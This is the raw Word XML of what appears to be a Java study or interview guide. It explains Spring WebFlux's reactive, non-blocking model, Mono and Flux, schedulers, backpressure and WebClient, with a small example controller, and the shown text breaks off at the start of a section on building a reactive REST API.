          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is based on non-blocking I/O. This enables it to efficiently handle a large number of concurrent events without blocking the execution thread for each request. Here's how it works in more detail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1A7CB" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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Key Concepts for Asynchronous Communication in Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EEF742"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ctive Streams and Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519050A7"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Spring WebFlux is built on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specification, which defines a standard for asynchronous stream processing. This allows it to handle multiple events concurrently in a non-blocking way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287300EB"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Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that when the application is waiting for I/O operations to complete (e.g., database queries, external HTTP requests), it doesn't block the current thread. Instead, the thread is released back to the thread pool, allowing the system to process other requests while waiting for the I/O operation to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF70093"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Publishers and Subscribers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DDF300"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n Spring WebFlux, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents a source of asynchronous events (like Mono or Flux), and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscriber</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a consumer that reacts to the emitted values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C01A8C"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ono is used for a single asynchronous result (like a single HTTP request/response), while Flux is used for multiple asynchronous results (like a stream of data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C734A5"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he application reacts to incoming HTTP requests as events and uses these </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive types</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle and return results asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223B51DE"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vent-Driven Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C086C4"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WebFlux treats HTTP requests as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>events</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and when an event occurs (e.g., a client sends an HTTP request), the application reacts to it asynchronously. The event is processed through a reactive pipeline, where each step is non-blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEF43A"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Each handler in WebFlux (like a controller method) can return a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive type</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono or Flux) that will eventually emit a result asynchronously. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes these events asynchronously and efficiently, reacting to each HTTP request as an event and completing the associated response when the event has been fully processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEC4BE9"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chedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328E06C"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 xml:space="preserve">Spring WebFlux allows you to control the execution context of asynchronous operations using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Schedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. For example, tasks like database queries or external API calls can be run on a different thread pool to avoid blocking the main event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52363A3E"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ubscribeOn()</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publishOn()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods are used to specify the thread on which to run the task (for example, using a thread pool to perform I/O operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05654069"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Backpressure Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1864A522"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Backpressure refers to situations where a publisher is producing events faster than a subscriber can consume them. WebFlux uses mechanisms from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle backpressure. For example, onBackpressureBuffer(), onBackpressureDrop(), and onBackpressureLatest() can be used to control how excess events are handled when they cannot be processed immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FCA89"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A9EB06"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WebClient is used to perform asynchronous HTTP requests in a non-blocking manner. It's part of the </w:t>
      </w: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xml:space="preserve"> module and allows for efficient communication with other services or APIs while handling the responses reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAA0551"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is ensures that Spring WebFlux can make external API calls without blocking the thread that initiated the request, allowing the server to handle other requests concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AE0DA" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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Asynchronous Workflow in Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0B84E"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quest Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9B4925"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When a request comes in, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dispatcher servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or the equivalent for non-servlet environments like Netty or Undertow) routes it to the appropriate handler (controller method).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26521537"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controller method returns a reactive type (Mono or Flux) that represents an asynchronous computation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3604B3BA"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ctive Pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6FAAC1"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nside the handler method, you can chain together operations such as calling external services, querying databases, or processing the data. These operations return </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive types</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono or Flux), and each operation is performed asynchronously, using non-blocking I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF69330"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or example, a call to a database or a remote service can be done asynchronously, and the request will continue to process other operations while waiting for the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617999FD"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vent Emission</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11155B00"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s data becomes available (e.g., the result of a database query or HTTP request), it is emitted by the reactive stream (Mono or Flux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50CB8A"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ubscribers to this stream will receive the data asynchronously, without blocking the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D6457"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Final Response</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F5D82"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Once the stream is complete (i.e., the last data item is emitted), Spring WebFlux sends the response to the client. This may happen immediately if the data is already available or after waiting for all asynchronous operations to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68532063" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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 of Asynchronous Communication in Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580E5FD6"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F87D5"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AsynchronousController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498AD038" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D62C603"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Simulate an asynchronous method (non-blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015360D9"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etMapping("/async")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B70CC4"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String&gt; getAsyncResponse() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6771B449"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Mono.just("Processing Request...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E4E48"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delayElement(Duration.ofSeconds(2))  // Simulating async operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADD9FF"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map(result -&gt; result + " Finished!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29911488"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3DCD79DA" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC86EE0"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Simulate an asynchronous call to another service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A523036"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etMapping("/external-api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E10613A"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String&gt; callExternalApi() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556EF790"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WebClient.create("https://api.example.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C3524"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et()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F7A25"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6DD600"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bodyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7A1CE"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map(response -&gt; "API Response: " + response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC73394"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1E128325"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473DD5C4" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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How the Above Example Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3EAA4E"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getAsyncResponse()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41182D9B"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turns a Mono&lt;String&gt; that simulates a delayed (non-blocking) operation with delayElement. The request is processed asynchronously, and the client will receive the result once the delay is over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A60C9"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allExternalApi()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587FD1D0"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ses WebClient to make an asynchronous, non-blocking HTTP request to an external API. It doesn't block the current thread while waiting for the response. The bodyToMono() method returns a Mono&lt;String&gt; that contains the API response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA10DC0" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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Benefits of Asynchronous Communication in Event-Driven Systems with WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F995BE3"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Non-Blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966E4D6"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ebFlux handles asynchronous operations without blocking the thread, allowing the system to scale efficiently, especially in I/O-bound workloads (e.g., file operations, database queries, or external API calls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B65C9A0"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oncurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF4B778"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ultiple requests can be processed concurrently without blocking, as each request can run on its own thread or be processed in the event loop asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F6735"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Low Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A975CAF"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synchronous processing reduces the latency in systems, particularly when waiting for external resources, as threads are not held up and can handle other tasks during waiting periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB65F1"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fficient Resource Utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15128327"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ince threads are not blocked, the system can process more requests with fewer resources, making it ideal for microservices or cloud-native applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E3647"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Backpressure Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B503BB" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0"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active programming provides built-in mechanisms to handle backpressure, ensuring the system remains responsive under high load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665CF0C7" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A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n summary, Spring WebFlux handles asynchronous communication by leveraging the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing non-blocking, concurrent processing of events, and ensuring that resources are used efficiently while maintaining responsiveness. This is particularly beneficial for applications that need to handle a large number of concurrent requests or real-time event processing, such as microservices, chat applications, or streaming systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FE4972"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694C58A">
          <v:rect id="_x0000_i2319" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A545B4C" w14:textId="62C31FEC"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20" w:name="_Toc196308000"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you use Spring WebFlux to implement a simple reactive REST API</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="520"/>
    </w:p>
    <w:p w14:paraId="6063ABF2" w14:textId="74966628" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9"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o implement a simple reactive REST API using Spring WebFlux, you'll follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC85B3F"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et Up Spring WebFlux Dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that your project is set up to use Spring WebFlux. You can add the required dependency in the pom.xml for Maven or build.gradle for Gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23617527" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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 Set Up the Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD816FB" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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Maven (pom.xml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F695C4"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t;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DC6056"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2F689ECE"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA11D53"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artifactId&gt;spring-boot-starter-webflux&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
